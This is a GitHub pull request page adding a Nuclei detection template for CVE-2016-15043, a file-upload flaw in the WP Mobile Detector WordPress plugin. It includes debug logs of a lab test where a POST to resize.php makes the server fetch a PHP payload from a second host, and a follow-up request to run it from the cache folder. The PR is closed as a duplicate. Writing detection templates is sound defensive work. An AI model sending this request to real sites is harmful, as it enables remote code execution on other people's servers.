Skip to content

Conversation

@thefuturrjfhejh
Copy link

@thefuturrjfhejh thefuturrjfhejh commented Jan 2, 2026

/claim #14673
PR Information
Added CVE-2016-15043
References:
https://aadityapurani.com/2016/06/03/mobile-detector-poc/
https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html
Template validation
Validated with a host running a vulnerable version and/or configuration (True Positive)
Validated with a host running a patched version and/or configuration (avoid False Positive)
Additional Details (leave it blank if not applicable)
The template was verified against a local environment running the vulnerable resize.php from WP Mobile Detector 3.5.

Nuclei Debug Output (True Positive):

[CVE-2016-15043] Dumped HTTP request for http://127.0.0.1:8000/wp-content/plugins/wp-mobile-detector/resize.php

POST /wp-content/plugins/wp-mobile-detector/resize.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 37
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

src=http://127.0.0.1:9000/payload.php

[CVE-2016-15043] Dumped HTTP response http://127.0.0.1:8000/wp-content/plugins/wp-mobile-detector/resize.php

HTTP/1.1 200 OK
Connection: close
Content-Length: 28
Content-Type: text/html; charset=UTF-8
Date: Fri, 02 Jan 2026 12:28:55 GMT
Host: 127.0.0.1:8000
X-Powered-By: PHP/8.3.6

[CVE-2016-15043] Dumped HTTP request for http://127.0.0.1:8000/wp-content/plugins/wp-mobile-detector/cache/payload.php

GET /wp-content/plugins/wp-mobile-detector/cache/payload.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Accept-Encoding: gzip

[CVE-2016-15043] Dumped HTTP response http://127.0.0.1:8000/wp-content/plugins/wp-mobile-detector/cache/payload.php

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Fri, 02 Jan 2026 12:28:55 GMT
Host: 127.0.0.1:8000
X-Powered-By: PHP/8.3.6

VULNERABLE
Additional References:
Nuclei Template Creation Guideline
Nuclei Template Matcher Guideline
Nuclei Template Contribution Guideline
PD-Community Discord server

google-labs-jules bot and others added 2 commits January 2, 2026 13:23
- Added Nuclei template for CVE-2016-15043.
- Added Docker reproduction environment for verification.
…etector-1734970523760189704

CVE-2016-15043: WP Mobile Detector Arbitrary File Upload
@thefuturrjfhejh
Copy link
Author

thefuturrjfhejh commented Jan 3, 2026

@pussycat0x this vulnerability was actually tested! And I sent the email for details as email... And you can check the template. There's no mock and no simulation, waiting for review!

@pussycat0x pussycat0x added the Done Ready to merge label Jan 5, 2026
@pussycat0x
Copy link
Contributor

Hi @thefuturrjfhejh , We already received PR this this CVE, thank you for your interest!

@pussycat0x pussycat0x closed this Jan 5, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants